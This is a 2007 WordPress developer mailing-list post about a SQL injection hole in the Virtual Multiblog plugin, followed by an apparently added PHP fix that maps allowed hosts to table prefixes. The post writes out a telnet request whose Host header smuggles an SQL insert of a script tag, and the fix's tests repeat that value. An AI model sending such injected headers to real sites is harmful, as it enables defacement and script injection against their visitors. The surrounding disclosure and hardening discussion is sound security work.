[wp-hackers] Virtual Multiblog
Jeremy Visser
jeremy.visser at gmail.com
Mon Nov 26 03:42:05 GMT 2007
On Sun, 2007-11-25 at 14:03 -0600, Andy Skelton wrote:
> At first glance, this looks like very unsafe code. It opens the door
> to SQL injection attacks via the Host header.
Ah yes, forgot about that. Exploiting would be as simple as:
$ telnet example.com 80
POST /wordpress/wp-comments-post.php HTTP/1.1\r\n
Host: example.com_posts post_content VALUES ('<script>muahahaha</script>') --\r\n
\r\n
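The fix for the problem Andy and Jeremy describe is to never let the raw Host header reach the query text at all. The following is an added example, not code from Virtual Multiblog or from either poster: it resolves the table prefix from a configured host-to-prefix map (the host names and prefixes are constructed for illustration) and refuses any host that is not listed, so a value like the one in the telnet session above is rejected before `$table_prefix` is ever set.

```php
<?php
// Added example (not Virtual Multiblog's own code): derive a per-host
// WordPress table prefix without interpolating $_SERVER['HTTP_HOST'] into SQL.

// Constructed allowlist of the hosts this install actually serves. The prefix
// comes from the map, so the Host header never becomes part of a query.
$VMB_HOST_PREFIXES = [
    'example.com'      => 'wp_example_',
    'blog.example.org' => 'wp_blogorg_',
];

/**
 * Return the table prefix for $host, or null if the host is not allowed.
 * The hypothetical name vmb_safe_table_prefix is this example's own.
 */
function vmb_safe_table_prefix(string $host, array $hostPrefixes): ?string
{
    // Drop an optional :port suffix and normalise case before the lookup.
    $host = strtolower(preg_replace('/:\d+$/', '', trim($host)));

    // Defensive second check: a hostname is only letters, digits, '-' and '.'.
    // Anything containing spaces, quotes, parentheses or '--' fails here.
    if (!preg_match('/^[a-z0-9.-]{1,253}$/', $host)) {
        return null;
    }

    // Unknown host: refuse rather than build a prefix from request input.
    return $hostPrefixes[$host] ?? null;
}

// Sanity checks of the lookup (constructed inputs):
//   vmb_safe_table_prefix('example.com', $VMB_HOST_PREFIXES)      -> 'wp_example_'
//   vmb_safe_table_prefix('EXAMPLE.COM:8080', $VMB_HOST_PREFIXES) -> 'wp_example_'
//   vmb_safe_table_prefix("example.com_posts post_content VALUES ('x') --",
//                         $VMB_HOST_PREFIXES)                     -> null
//   vmb_safe_table_prefix('evil.example.net', $VMB_HOST_PREFIXES) -> null

// Usage in the wp-config.php stage: refuse the request when no prefix resolves.
$prefix = vmb_safe_table_prefix($_SERVER['HTTP_HOST'] ?? '', $VMB_HOST_PREFIXES);
if ($prefix === null) {
    header('HTTP/1.1 400 Bad Request');
    exit('Unknown host');
}
$table_prefix = $prefix; // the value wp-config.php normally hard-codes
```

The allowlist is the real control here; the character-class regex is only a backstop in case the map is later populated from a less trusted source. Deriving the prefix by string-mangling the Host header, even with some characters escaped, still hands an attacker influence over a SQL identifier, which prepared statements do not protect.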